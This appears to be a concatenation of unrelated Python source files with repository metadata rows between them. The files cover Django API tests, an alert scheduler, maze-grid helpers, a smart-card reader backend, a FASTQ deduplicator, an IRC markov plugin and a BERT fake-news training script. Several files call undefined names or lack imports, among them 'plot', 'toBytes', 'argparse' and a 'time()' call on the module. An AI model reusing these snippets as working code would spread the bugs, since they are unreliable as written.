self.assertEqual(response.status_code, status.HTTP_200_OK)
expectedUsers = [
{
'username': 'AnonymousUser',
'email': '',
'first_name': '',
'last_name': '',
},
{
'username': 'user',
'email': 'user@test.com',
'first_name': '',
'last_name': '',
},
{
'username': 'admin',
'email': 'admin@test.com',
'first_name': '',
'last_name': '',
},
]
self.assertEqual(expectedUsers, response.data['results'])
def test_user_create_fail(self):
pass
def test_user_update_fail(self):
pass
def test_user_delete_fail(self):
pass
class TestAuthViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_auth_ok(self):
loginWithAPI(self.client, 'test', 'secret')
response = self.client.get('/test/auth', {}, format='json')
self.assertEqual(200, response.status_code)
def test_auth_fail(self):
response = self.client.get('/test/auth', {}, format='json')
self.assertEqual(401, response.status_code)
class ContactViewTest(TestCase):
def test_create_ok(self):
response = self.client.post(
'/contact/', {
'email': 'john@doe.com',
'message': 'This is a test message',
},
format='json')
self.assertEquals(200, response.status_code)
self.assertEquals('Contact message has been sent',
response.data['detail'])
class ConfirmProjectInvitationViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_create_public_token(self):
# Create a project
project = Project.objects.create(name='testproject')
# Create a project invitation token (without email)
invite_token = ProjectInvitationToken.objects.create(project=project)
self.assertFalse(self.test_user.has_perm('view_project', project))
loginWithAPI(self.client, 'test', 'secret')
url = '/projects/invitations/{key}/confirm/'.format(
key=invite_token.key)
response = self.client.post(url, {}, format='json')
self.assertEquals(200, response.status_code)
self.assertTrue(self.test_user.has_perm('view_project', project))
def test_create_public_token_new_user(self):
# Create a project
project = Project.objects.create(name='testproject')
# Create a project invitation token (without email)
invite_token = ProjectInvitationToken.objects.create(project=project)
# Register a new user with API
response = self.client.post(
'/auth/registration/',
dict(
username='test2',
email='test@example.com',
password1='secret0345',
password2='secret0345'),
format='json')
self.assertEquals(201, response.status_code)
user_token = response.data['key']
# Get user and check permissions
user = User.objects.get(username='test2')
self.assertFalse(user.has_perm('view_project', project))
# Confirm invitation of user to project
url = '/projects/invitations/{key}/confirm/'.format(
key=invite_token.key)
self.client.credentials(HTTP_AUTHORIZATION=user_token)
response = self.client.post(url, {}, format='json')
self.assertEquals(200, response.status_code)
# Check permissions again
self.assertTrue(user.has_perm('view_project', project))
| 34.488688 | 79 | 0.604041 |
b9dd3cdc777139d70ac5467e0b1e15118b71ab62 | 67 | py | Python | cbrunner/__init__.py | RobbieHember/fcgadgets | d968991ea185d48df8d674d290b7e03bfc8843d4 | [
"Apache-2.0"
] | 2 | 2021-11-18T21:29:37.000Z | 2022-01-13T23:40:42.000Z | cbrunner/__init__.py | RobbieHember/fcgadgets | d968991ea185d48df8d674d290b7e03bfc8843d4 | [
"Apache-2.0"
] | null | null | null | cbrunner/__init__.py | RobbieHember/fcgadgets | d968991ea185d48df8d674d290b7e03bfc8843d4 | [
"Apache-2.0"
] | null | null | null | name="cbrunner"
__all__=["cbrun","cbrun_annproc","cbrun_utilities"] | 33.5 | 51 | 0.776119 |
325e6ec0d4429ebb174401abffed720b8600f1c7 | 1,917 | py | Python | netwatch/scheduler.py | tkmcclellan/NetWatch | d195b39a4d8782153e8f26585049ff78f5fc56f7 | [
"MIT"
] | 1 | 2021-02-12T16:27:55.000Z | 2021-02-12T16:27:55.000Z | netwatch/scheduler.py | tkmcclellan/NetWatch | d195b39a4d8782153e8f26585049ff78f5fc56f7 | [
"MIT"
] | 14 | 2021-02-11T16:19:00.000Z | 2021-03-16T16:03:59.000Z | netwatch/scheduler.py | tkmcclellan/NetWatch | d195b39a4d8782153e8f26585049ff78f5fc56f7 | [
"MIT"
] | null | null | null | """Module for running scheduled NetWatch jobs.
This module processes NetWatch alerts according to their
frequency.
Todo:
* Find a way to process alerts in parallel and shut down those processes immediately
"""
import threading
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
from croniter import croniter
from netwatch.common import process_alert
from netwatch.store import store
class Scheduler:
"""A job scheduler for running NetWatch jobs.
Attributes:
stop_scheduler (threading.Event): Event for stopping the
scheduler from another thread.
thread (threading.Thread): Thread for running scheduler handler.
executor (concurrent.futures.ThreadPoolExecutor): Executor
for running scheduled NetWatch Alerts in parallel.
"""
def __init__(self):
self.stop_scheduler = threading.Event()
self.thread = threading.Thread(target=self._scheduler_handler, args=())
self.executor = ThreadPoolExecutor(3)
def start(self):
"""Starts the scheduler"""
self.stop_scheduler.clear()
self.thread.start()
def stop(self):
"""Stops the scheduler"""
self.stop_scheduler.set()
self.thread.join()
self.executor.shutdown()
def _scheduler_handler(self):
while not self.stop_scheduler.is_set():
jobs = []
for alert in store.get_alerts():
time = datetime.now()
time = datetime(
time.year, time.month, time.day, time.hour, time.minute
) # no seconds value
itr = croniter(alert.frequency, time)
if time == itr.get_current(datetime):
jobs.append(alert.id)
if len(jobs) > 0:
self.executor.submit(process_alert, (jobs))
self.stop_scheduler.wait(60)
| 28.61194 | 88 | 0.637454 |
f8384979704184e461c5b390000a58adb9a8079c | 1,846 | py | Python | main.py | guo-yong-zhi/Maze | 4f627f293b94171e3989e2ce60a892d0ec8d8942 | [
"MIT"
] | null | null | null | main.py | guo-yong-zhi/Maze | 4f627f293b94171e3989e2ce60a892d0ec8d8942 | [
"MIT"
] | null | null | null | main.py | guo-yong-zhi/Maze | 4f627f293b94171e3989e2ce60a892d0ec8d8942 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 11 15:02:26 2017
@author: momos
"""
import numpy as np
from matplotlib import pyplot as plt
array = np.array
def neiPairsOf(idim, trans=-1, shift=None):
shift = shift or (lambda im,pairs:[np.roll(im,(d,r),axis=(0,1)) for d,r in pairs])
def toNeiPairs(a, b):
a = a.reshape(-1, 1)
b = b.reshape(-1, 1)
pairs = np.hstack([a,b])
pairs = pairs[pairs[:,0] != trans]
pairs = pairs[pairs[:,1] != trans]
return pairs
neiPairs = [toNeiPairs(idim, neimage) for neimage in shift(idim, [(1,0),(0,1)])]
return np.vstack(neiPairs)
def to_id_image(im, transOld=0, transNew=-1):
idim = np.arange(im.ravel().shape[0]).reshape(im.shape)
idim[im==transOld] = transNew
return idim
def toCoords(ids, shape):
ids = array(ids)
m,n = shape
r = ids // n
c = ids % n
return np.column_stack([r,c])
def toIDs(coords, shape):
coords = array(coords)
m, n = shape
r, c = coords.T
if isinstance(r, np.ndarray):
r[r<0] += m
c[c<0] += n
else:
r = r if r>=0 else r + m
c = c if c>=0 else c + n
return r * n + c
def plotGroup(im, group):
plt.imshow(im)
yx = toCoords(list(group), im.shape)
plot(yx[:,1],yx[:,0],'r.')
plt.axis("off")
plt.show()
def shift_neonespadding(arr, disp_pairs):
h,w = arr.shape
paded = np.empty((h+2,w+2), dtype=int)
paded[(0,-1),:] = -1
paded[:,(0,-1)] = -1
paded[1:-1,1:-1] = arr
shift = lambda d,r: paded[-d+1:-d+1+h, -r+1:-r+1+w]
return [shift(d,r) for d,r in disp_pairs]
img = np.ones((10,10),np.int8)
idim = to_id_image(img)
nepairs = neiPairsOf(idim, shift=shift_neonespadding)
| 24.945946 | 87 | 0.534128 |
e1bec4fa6af7b2642384626bae7c70a324484fcb | 3,028 | py | Python | platypush/backend/scard/__init__.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/backend/scard/__init__.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | platypush/backend/scard/__init__.py | RichardChiang/platypush | 1777ebb0516118cdef20046a92caab496fa7c6cb | [
"MIT"
] | null | null | null | import json
from platypush.backend import Backend
from platypush.message.event.scard import SmartCardDetectedEvent, SmartCardRemovedEvent
class ScardBackend(Backend):
"""
Generic backend to read smart cards and NFC tags and trigger an event
whenever a device is detected.
Extend this backend to implement more advanced communication with custom
smart cards.
Triggers:
* :class:`platypush.message.event.scard.SmartCardDetectedEvent` when a smart card is detected
* :class:`platypush.message.event.scard.SmartCardRemovedEvent` when a smart card is removed
Requires:
* **pyscard** (``pip install pyscard``)
"""
def __init__(self, atr=None, *args, **kwargs):
"""
:param atr: If set, the backend will trigger events only for card(s) with the specified ATR(s). It can be either an ATR string (space-separated hex octects) or a list of ATR strings. Default: none (any card will be detected)
"""
from smartcard.CardType import AnyCardType, ATRCardType
super().__init__(*args, **kwargs)
self.ATRs = []
if atr:
if isinstance(atr, str):
self.ATRs = [atr]
elif isinstance(atr, list):
self.ATRs = atr
else:
raise RuntimeError("Unsupported ATR: \"{}\" - type: {}, " +
"supported types: string, list".format(
atr, type(atr)))
self.cardtype = ATRCardType( *[toBytes(atr) for atr in self.ATRs] )
else:
self.cardtype = AnyCardType()
def run(self):
from smartcard.CardRequest import CardRequest
from smartcard.Exceptions import NoCardException, CardConnectionException
from smartcard.util import toHexString
super().run()
self.logger.info('Initialized smart card reader backend - ATR filter: {}'.
format(self.ATRs))
prev_atr = None
reader = None
while not self.should_stop():
try:
cardrequest = CardRequest(timeout=None, cardType=self.cardtype)
cardservice = cardrequest.waitforcard()
cardservice.connection.connect()
reader = cardservice.connection.getReader()
atr = toHexString(cardservice.connection.getATR())
if atr != prev_atr:
self.logger.info('Smart card detected on reader {}, ATR: {}'.
format(reader, atr))
self.bus.post(SmartCardDetectedEvent(atr=atr, reader=reader))
prev_atr = atr
except Exception as e:
if isinstance(e, NoCardException) or isinstance(e, CardConnectionException):
self.bus.post(SmartCardRemovedEvent(atr=prev_atr, reader=reader))
else:
self.logger.exception(e)
prev_atr = None
# vim:sw=4:ts=4:et:
| 34.409091 | 233 | 0.588507 |
785274ce51a5ae7bb7861cf9d9de1668e29d11ba | 846 | py | Python | src/awsCluster/miRNASeq/DeduplicateFastqFile.py | AspirinCode/jupyter-genomics | d45526fab3de8fcc3d9fef005d4e39368ff3dfdc | [
"MIT"
] | 2 | 2019-01-04T08:17:27.000Z | 2021-04-10T02:59:35.000Z | src/awsCluster/miRNASeq/DeduplicateFastqFile.py | AspirinCode/jupyter-genomics | d45526fab3de8fcc3d9fef005d4e39368ff3dfdc | [
"MIT"
] | null | null | null | src/awsCluster/miRNASeq/DeduplicateFastqFile.py | AspirinCode/jupyter-genomics | d45526fab3de8fcc3d9fef005d4e39368ff3dfdc | [
"MIT"
] | 2 | 2021-09-10T02:57:51.000Z | 2021-09-21T00:16:56.000Z | __author__ = 'Guorong Xu<g1xu@ucsd.edu>'
import sys
def deduplicate(raw_file):
fastq_id_list = {}
print "system is processing " + raw_file
filewriter = open(raw_file.replace("unfilter.fastq", "trim.fastq"), "w")
with open(raw_file, 'r+') as f:
lines = f.readlines()
line_index = 0
printable = True
for line in lines:
if line_index % 4 == 0 and line.rstrip() in fastq_id_list:
printable = False
if line_index % 4 == 0 and line.rstrip() not in fastq_id_list:
fastq_id_list.update({line.rstrip():line.rstrip()})
if printable:
filewriter.write(line)
line_index = line_index + 1
filewriter.close()
f.close()
if __name__ == "__main__":
raw_file = sys.argv[1]
deduplicate(raw_file)
| 24.171429 | 76 | 0.585106 |
1c09d1a15d91cfecb926724101e0c2f8e8660495 | 4,131 | py | Python | bot_modules/py/markov.py | cumdata/irc_bot | 6593215acb7850f435389ae64652d831279f3332 | [
"WTFPL"
] | null | null | null | bot_modules/py/markov.py | cumdata/irc_bot | 6593215acb7850f435389ae64652d831279f3332 | [
"WTFPL"
] | 2 | 2021-09-10T04:15:59.000Z | 2021-09-14T03:30:21.000Z | bot_modules/py/markov.py | cumdata/irc_bot | 6593215acb7850f435389ae64652d831279f3332 | [
"WTFPL"
] | null | null | null | """simple markov chaining for shitposting"""
import asyncio
import os
import pathlib
import random
import colors
import logger
import plugin_api
_logger = logger.LOGGER
# End of Sentence for Markov chaining
EOS = ('.', '?', '!')
def _should_log(msg):
"""Returns bool to log or not
will return False if:
- msg starts with a . (period)
- has color control char (0x03) in it
:param str msg: message
:returns: bool value weather to log or not
:rtype: bool
"""
if msg.startswith('.'):
return False
if colors.CONTROL_COLOR in msg:
return False
return True
def _maybe_log(msg):
"""Maybe write message to disk. see _should_log method
:param str msg: the message
"""
if not _should_log(msg):
return
if not msg.endswith(EOS):
msg += '.'
proj_folder = pathlib.Path(__file__).parent.parent.parent.resolve()
with open(f'{proj_folder}{os.path.sep}chatter.log', 'a') as f:
msg = msg.strip(' ')
modified_sentence = msg[0].capitalize() + msg[1:]
f.write(f'\n{modified_sentence}')
def _shitpost(seed_word=None):
proj_folder = pathlib.Path(__file__).parent.parent.parent.resolve()
with open(f'{proj_folder}{os.path.sep}chatter.log', "r") as log:
text = log.read()
words = text.split()
model = _build_dict(words)
sentence = _generate_sentence(model, seed_word)
return sentence
def _build_dict(words):
"""Builds a dictionary of words
:param list[str] words: words
:returns: dictionary of words
:rtype: dict
"""
d = {}
for i, word in enumerate(words):
try:
first, second, third = words[i], words[i + 1], words[i + 2]
except IndexError:
break
key = (first, second)
if key not in d:
d[key] = []
d[key].append(third)
return d
def _generate_sentence(d, seed_word):
"""Generate sentence
:param dict d: dict of words
:returns: a sentence based off of the words
:rtype: str
"""
words_set = [key for key in d.keys() if key[0][0].isupper()]
if seed_word:
key_tuples = [
i for i in words_set
if seed_word.lower() in i[0][0].lower() + i[0][1:]
or seed_word.lower() in i[1][0].lower() + i[1][1:]
]
try:
key = random.choice(key_tuples)
except IndexError:
_logger.error('IndexError, using random')
key = random.choice(words_set)
else:
key = random.choice(words_set)
li = []
first, second = key
li.append(first)
li.append(second)
while True:
try:
third = random.choice(d[key])
except KeyError:
break
li.append(third)
if third[-1] in EOS:
break
else:
key = (second, third)
first, second = key
return ' '.join(li)
class Plugin(plugin_api.LocalPlugin):
"""Markov plugin"""
_join_seen = set()
def help_msg(self):
return ".markov <optional arg> to generate random sentence"
async def on_message(self, target, by, message):
await super().on_message(target, by, message)
if not self.enabled:
return
await self.exec_thread(_maybe_log, message)
if message.startswith('.markov'):
parts = message.split(' ')
if len(parts) == 1:
args = None
elif len(parts) > 1:
args = parts[1]
else:
return
sentence = await asyncio.ensure_future(
self.exec_proc(_shitpost, args)
)
await self.client.message(target, sentence)
async def on_join(self, channel, user):
await super().on_join(channel, user)
if not self.enabled:
return
if user in self._join_seen:
return
sentence = await asyncio.ensure_future(
self.exec_proc(_shitpost, user)
)
self._join_seen.add(user)
await self.client.message(channel, sentence)
| 25.343558 | 71 | 0.573469 |
85bb1b6680fc09cbcea38ccf61f15078ca3f5a02 | 636 | py | Python | kws/utils/utils.py | khaykingleb/KWS | 12fa52414cb9135cea6e4d5200b334b7920b6a9e | [
"MIT"
] | null | null | null | kws/utils/utils.py | khaykingleb/KWS | 12fa52414cb9135cea6e4d5200b334b7920b6a9e | [
"MIT"
] | null | null | null | kws/utils/utils.py | khaykingleb/KWS | 12fa52414cb9135cea6e4d5200b334b7920b6a9e | [
"MIT"
] | null | null | null | import random
import os
import numpy as np
import torch
from thop import profile
import tempfile
def seed_everything(seed: int = 42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.enabled = False
torch.backends.cudnn.deterministic = True
os.environ["CUBLAS_WORKSPACE_CONFIG"] = ":4096:2"
def get_size_in_megabytes(model):
with tempfile.TemporaryFile() as f:
torch.save(model.state_dict(), f)
size = f.tell() / (2 ** 20)
return size
| 25.44 | 53 | 0.701258 |
67305a3aadcca6c68993b57c152eb7d92ddb6bc0 | 1,813 | py | Python | preprocess/test_base.py | Lummetry/CFDS | c2175180e071811dd5aad5fe6bf00976e0b64095 | [
"Apache-2.0"
] | null | null | null | preprocess/test_base.py | Lummetry/CFDS | c2175180e071811dd5aad5fe6bf00976e0b64095 | [
"Apache-2.0"
] | null | null | null | preprocess/test_base.py | Lummetry/CFDS | c2175180e071811dd5aad5fe6bf00976e0b64095 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Copyright 2019 Lummetry.AI (Knowledge Investment Group SRL). All Rights Reserved.
* NOTICE: All information contained herein is, and remains
* the property of Knowledge Investment Group SRL.
* The intellectual and technical concepts contained
* herein are proprietary to Knowledge Investment Group SRL
* and may be covered by Romanian and Foreign Patents,
* patents in process, and are protected by trade secret or copyright law.
* Dissemination of this information or reproduction of this material
* is strictly forbidden unless prior written permission is obtained
* from Knowledge Investment Group SRL.
@copyright: Lummetry.AI
@author: Lummetry.AI - Andrei
@project:
@description:
"""
import numpy as np
import scipy.sparse as sparse
import pandas as pd
import time
if __name__ == '__main__':
TEST_SIZE = 0.2
LAMBDA = 1
y = np.load('datasets/y.npy')
csr = sparse.load_npz('datasets/x_csr.npz')
X = csr.toarray()
# X[:,0] = (X[:,0] - X[:,0].mean()) / X[:,0].std()
X[:,0] = (X[:,0] - X[:,0].min()) / (X[:,0].max() - X[:,0].min())
# X = X[:,:100]
train_sample = np.random.choice(
[0,1],
replace=True,
size=X.shape[0],
p=[TEST_SIZE, 1-TEST_SIZE],
).astype(bool)
X_train = X[train_sample]
y_train = y[train_sample]
X_test = X[~train_sample]
y_test = y[~train_sample]
start = time()
theta = np.linalg.inv(X_train.T.dot(X_train) + LAMBDA * np.eye(X_train.shape[1])).dot(X_train.T).dot(y_train)
stop = time()
print('Results for X shape: {}'.format(X.shape))
print(' Total time: {}'.format(stop - start))
y_pred = X_test.dot(theta).round(0)
MAE = np.abs(y_pred - y_test).mean()
print(' MAE: {}'.format(MAE))
df_res = pd.DataFrame({'pred':y_pred, 'gold':y_test})
print(df_res.head(10))
| 27.469697 | 111 | 0.663541 |
48a02234f2254a037dbe99896483efb4166ba6a4 | 26,425 | py | Python | src/train.py | prathameshmahankal/Fake-News-Detection-Using-BERT | 7723843520b95d898890b70a909ac19ecb0eeffa | [
"MIT"
] | 3 | 2021-05-28T22:42:40.000Z | 2022-03-18T01:03:14.000Z | src/train.py | VeraSAMAooo/Fake-News-Detection-Using-BERT | 7723843520b95d898890b70a909ac19ecb0eeffa | [
"MIT"
] | null | null | null | src/train.py | VeraSAMAooo/Fake-News-Detection-Using-BERT | 7723843520b95d898890b70a909ac19ecb0eeffa | [
"MIT"
] | 2 | 2021-12-01T19:03:53.000Z | 2022-02-20T02:45:04.000Z | import numpy as np
import pandas as pd
import torch
import time
import joblib
import torch.nn as nn
from sklearn.model_selection import train_test_split
from sklearn.metrics import (classification_report, f1_score, recall_score, precision_score,
precision_recall_curve, confusion_matrix, matthews_corrcoef)
import transformers
from transformers import AutoModel, BertTokenizerFast
from transformers import AdamW
from sklearn.utils.class_weight import compute_class_weight
from azureml.core import Workspace, Run, Dataset
import matplotlib.pyplot as plt
# paramters
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_path',
type=str,
help='Path to the training data'
)
parser.add_argument(
'--learning_rate',
type=float,
default=3e-5,
help='Learning rate for SGD'
)
parser.add_argument(
'--batch_size',
type=int,
dest='batch_size',
default=8
)
parser.add_argument(
'--adam_epsilon',
type=float,
dest='adam_epsilon',
default=1e-8
)
parser.add_argument(
'--num_epochs',
type=int,
dest='num_epochs',
default=3)
args = parser.parse_args()
batch_size = args.batch_size
learning_rate = args.learning_rate
adam_epsilon = args.adam_epsilon
num_epochs = args.num_epochs
print("Arguments: ", (batch_size, learning_rate, adam_epsilon, num_epochs))
# run = Run.get_context()
print("===== DATA =====")
print("DATA PATH: " + args.data_path)
print("LIST FILES IN DATA PATH...")
print(os.listdir(args.data_path))
print("================")
# ws = run.experiment.workspace
# # get the input dataset by ID
# dataset = Dataset.get_by_id(ws, id=args.data_path)
# # load the TabularDataset to pandas DataFrame
# df = dataset.to_pandas_dataframe()
df = pd.read_csv(args.data_path+'/newdatasetwithcoviddata.csv')
df.dropna(inplace=True)
df = df.sample(50000)
train_text, temp_text, train_labels, temp_labels = train_test_split(df['text'], df['label'],
random_state=2018,
test_size=0.4,
stratify=df['label'])
# we will use temp_text and temp_labels to create validation and test set
val_text, test_text, val_labels, test_labels = train_test_split(temp_text, temp_labels,
random_state=2018,
test_size=0.5,
stratify=temp_labels)
# import BERT-base pretrained model
bert = AutoModel.from_pretrained('bert-base-uncased')
## Tokenization
max_seq_len = 25
# Load the BERT tokenizer
tokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')
# tokenize and encode sequences in the training set
tokens_train = tokenizer.batch_encode_plus(
train_text.tolist(),
max_length = max_seq_len,
pad_to_max_length=True,
truncation=True,
return_token_type_ids=False
)
# tokenize and encode sequences in the validation set
tokens_val = tokenizer.batch_encode_plus(
val_text.tolist(),
max_length = max_seq_len,
pad_to_max_length=True,
truncation=True,
return_token_type_ids=False
)
# tokenize and encode sequences in the test set
tokens_test = tokenizer.batch_encode_plus(
test_text.tolist(),
max_length = max_seq_len,
pad_to_max_length=True,
truncation=True,
return_token_type_ids=False
)
## Convert Integer Sequences to Tensors
# for train set
train_seq = torch.tensor(tokens_train['input_ids'])
train_mask = torch.tensor(tokens_train['attention_mask'])
train_y = torch.tensor(train_labels.tolist())
# for validation set
val_seq = torch.tensor(tokens_val['input_ids'])
val_mask = torch.tensor(tokens_val['attention_mask'])
val_y = torch.tensor(val_labels.tolist())
# for test set
test_seq = torch.tensor(tokens_test['input_ids'])
test_mask = torch.tensor(tokens_test['attention_mask'])
test_y = torch.tensor(test_labels.tolist())
## Create DataLoaders
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
# #define a batch size
# batch_size = 32
# wrap tensors
train_data = TensorDataset(train_seq, train_mask, train_y)
# sampler for sampling the data during training
train_sampler = RandomSampler(train_data)
# dataLoader for train set
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=batch_size)
# wrap tensors
val_data = TensorDataset(val_seq, val_mask, val_y)
# sampler for sampling the data during training
val_sampler = SequentialSampler(val_data)
# dataLoader for validation set
val_dataloader = DataLoader(val_data, sampler = val_sampler, batch_size=batch_size)
## Freeze BERT Parameters
# freeze all the parameters
for param in bert.parameters():
param.requires_grad = False
## Define Model Architecture
class BERT_Arch(nn.Module):
def __init__(self, bert):
super(BERT_Arch, self).__init__()
self.bert = bert
# dropout layer
self.dropout = nn.Dropout(0.1)
# relu activation function
self.relu = nn.ReLU()
# dense layer 1
self.fc1 = nn.Linear(768,512)
# dense layer 2 (Output layer)
self.fc2 = nn.Linear(512,2)
#softmax activation function
self.softmax = nn.LogSoftmax(dim=1)
#define the forward pass
def forward(self, sent_id, mask):
#pass the inputs to the model
_, cls_hs = self.bert(sent_id, attention_mask=mask, return_dict=False)
x = self.fc1(cls_hs)
x = self.relu(x)
x = self.dropout(x)
# output layer
x = self.fc2(x)
# apply softmax activation
x = self.softmax(x)
return x
# pass the pre-trained BERT to our define architecture
model = BERT_Arch(bert)
# push the model to GPU
model = model.to(device)
# optimizer from hugging face transformers
# define the optimizer
optimizer = AdamW(model.parameters(), lr = learning_rate)
# adam_epsilon, num_epochs
## Find Class Weights
#compute the class weights
class_wts = compute_class_weight('balanced', np.unique(train_labels), train_labels)
# convert class weights to tensor
weights= torch.tensor(class_wts,dtype=torch.float)
weights = weights.to(device)
# loss function
cross_entropy = nn.NLLLoss(weight=weights)
## Fine Tune BERT
# function to train the model
def train():
model.train()
total_loss, total_accuracy = 0, 0
# empty list to save model predictions
total_preds=[]
# iterate over batches
for step,batch in enumerate(train_dataloader):
# progress update after every 50 batches.
if step % 50 == 0 and not step == 0:
print(' Batch {:>5,} of {:>5,}.'.format(step, len(train_dataloader)))
# push the batch to gpu
batch = [r.to(device) for r in batch]
sent_id, mask, labels = batch
# clear previously calculated gradients
model.zero_grad()
# get model predictions for the current batch
preds = model(sent_id, mask)
# compute the loss between actual and predicted values
loss = cross_entropy(preds, labels)
# add on to the total loss
total_loss = total_loss + loss.item()
# backward pass to calculate the gradients
loss.backward()
# clip the the gradients to 1.0. It helps in preventing the exploding gradient problem
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
# update parameters
optimizer.step()
# model predictions are stored on GPU. So, push it to CPU
preds=preds.detach().cpu().numpy()
# append the model predictions
total_preds.append(preds)
# compute the training loss of the epoch
avg_loss = total_loss / len(train_dataloader)
# predictions are in the form of (no. of batches, size of batch, no. of classes).
# reshape the predictions in form of (number of samples, no. of classes)
total_preds = np.concatenate(total_preds, axis=0)
#returns the loss and predictions
return avg_loss, total_preds
# function for evaluating the model
def evaluate():
print("\nEvaluating...")
# deactivate dropout layers
model.eval()
total_loss, total_accuracy = 0, 0
# empty list to save the model predictions
total_preds = []
# iterate over batches
for step,batch in enumerate(val_dataloader):
# Progress update every 50 batches.
if step % 50 == 0 and not step == 0:
# Calculate elapsed time in minutes.
# elapsed = format_time(time.time() - t0)
# Report progress.
print(' Batch {:>5,} of {:>5,}.'.format(step, len(val_dataloader)))
# push the batch to gpu
batch = [t.to(device) for t in batch]
sent_id, mask, labels = batch
# deactivate autograd
with torch.no_grad():
# model predictions
preds = model(sent_id, mask)
# compute the validation loss between actual and predicted values
loss = cross_entropy(preds,labels)
total_loss = total_loss + loss.item()
preds = preds.detach().cpu().numpy()
total_preds.append(preds)
# compute the validation loss of the epoch
avg_loss = total_loss / len(val_dataloader)
# reshape the predictions in form of (number of samples, no. of classes)
total_preds = np.concatenate(total_preds, axis=0)
return avg_loss, total_preds
# set initial loss to infinite
best_valid_loss = float('inf')
# empty lists to store training and validation loss of each epoch
train_losses=[]
valid_losses=[]
out_dir = './outputs'
#for each epoch
for epoch in range(num_epochs):
print('\n Epoch {:} / {:}'.format(epoch + 1, num_epochs))
#train model
train_loss, _ = train()
#evaluate model
valid_loss, _ = evaluate()
#save the best model
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
torch.save(model.state_dict(), out_dir+'/saved_weights.pt')
# append training and validation loss
train_losses.append(train_loss)
valid_losses.append(valid_loss)
print(f'\nTraining Loss: {train_loss:.3f}')
print(f'Validation Loss: {valid_loss:.3f}')
## Save losses
with open(out_dir + '/train_losses.pkl', 'wb') as f:
joblib.dump(train_losses, f)
with open(out_dir + '/val_losses.pkl', 'wb') as f:
joblib.dump(valid_losses, f)
plt.plot(range(len(train_losses)), train_losses, label='training loss')
plt.plot(range(len(valid_losses)), valid_losses, label='validation loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()
plt.savefig(out_dir + '/losses.png')
## Load Saved Model
#load weights of best model
model.load_state_dict(torch.load(out_dir+'/saved_weights.pt'))
## Get Predictions for Test Data
# get predictions for test data
with torch.no_grad():
preds = model(test_seq.to(device), test_mask.to(device))
preds = preds.detach().cpu().numpy()
# model's performance
precision_, recall_, proba = precision_recall_curve(test_y, preds[:, -1])
preds = np.argmax(preds, axis = 1)
#plot precision-recall curve
plt.plot(recall_, precision_, marker='.', label='BERT-model')
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.legend()
plt.savefig(out_dir + '/precision-reall-curve.png')
# optimal_proba_cutoff = sorted(list(zip(np.abs(precision_ - recall_), proba)), key=lambda i: i[0], reverse=False)[0][1]
# preds = [1 if i >= optimal_proba_cutoff else 0 for i in preds[:, -1]]
mcc = matthews_corrcoef(test_y, preds)
tn, fp, fn, tp = confusion_matrix(test_y, preds).ravel()
precision = precision_score(test_y, preds)
recall = recall_score(test_y, preds)
f1 = f1_score(test_y, preds, average='weighted')
cm = confusion_matrix(test_y, preds)
print("")
print("Matthews Corr Coef:", mcc)
print("Precision:", precision)
print("Recall:", recall)
print("f-1 score:", f1)
print("confusion Matrix:", cm)
print("")
print(classification_report(test_y, preds))
# from __future__ import absolute_import, division, print_function
# import glob
# import logging
# import os
# import random
# import json
# import numpy as np
# import torch
# from torch.utils.data import (DataLoader, RandomSampler, SequentialSampler, TensorDataset)
# import random
# from torch.utils.data.distributed import DistributedSampler
# from tqdm import tqdm_notebook, trange
# from pytorch_transformers import (WEIGHTS_NAME, BertConfig, BertForSequenceClassification, BertTokenizer,
# XLMConfig, XLMForSequenceClassification, XLMTokenizer,
# XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer,
# RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)
# from pytorch_transformers import AdamW, WarmupLinearSchedule
# from sklearn.metrics import (mean_squared_error, matthews_corrcoef, confusion_matrix, f1_score,
# precision_score, recall_score, precision_recall_curve, plot_precision_recall_curve)
# from scipy.stats import pearsonr
# from utils import (convert_examples_to_features, output_modes, processors)
# logging.basicConfig(level=logging.INFO)
# logger = logging.getLogger(__name__)
# def load_and_cache_examples(task, tokenizer, evaluate=False, undersample_scale_factor=0.01):
# processor = processors[task]()
# output_mode = args['output_mode']
# mode = 'dev' if evaluate else 'train'
# cached_features_file = os.path.join(args['data_dir'], f"cached_{mode}_{args['model_name']}_{args['max_seq_length']}_{task}")
# if os.path.exists(cached_features_file) and not args['reprocess_input_data']:
# logger.info("Loading features from cached file %s", cached_features_file)
# features = torch.load(cached_features_file)
# else:
# logger.info("Creating features from dataset file at %s", args['data_dir'])
# label_list = processor.get_labels()
# examples = processor.get_dev_examples(args['data_dir']) if evaluate else processor.get_train_examples(args['data_dir'])
# print(len(examples))
# examples = [example for example in examples if np.random.rand() < undersample_scale_factor]
# print(len(examples))
# features = convert_examples_to_features(examples, label_list, args['max_seq_length'], tokenizer, output_mode,
# cls_token_at_end=bool(args['model_type'] in ['xlnet']), # xlnet has a cls token at the end
# cls_token=tokenizer.cls_token,
# sep_token=tokenizer.sep_token,
# cls_token_segment_id=2 if args['model_type'] in ['xlnet'] else 0,
# pad_on_left=bool(args['model_type'] in ['xlnet']), # pad on the left for xlnet
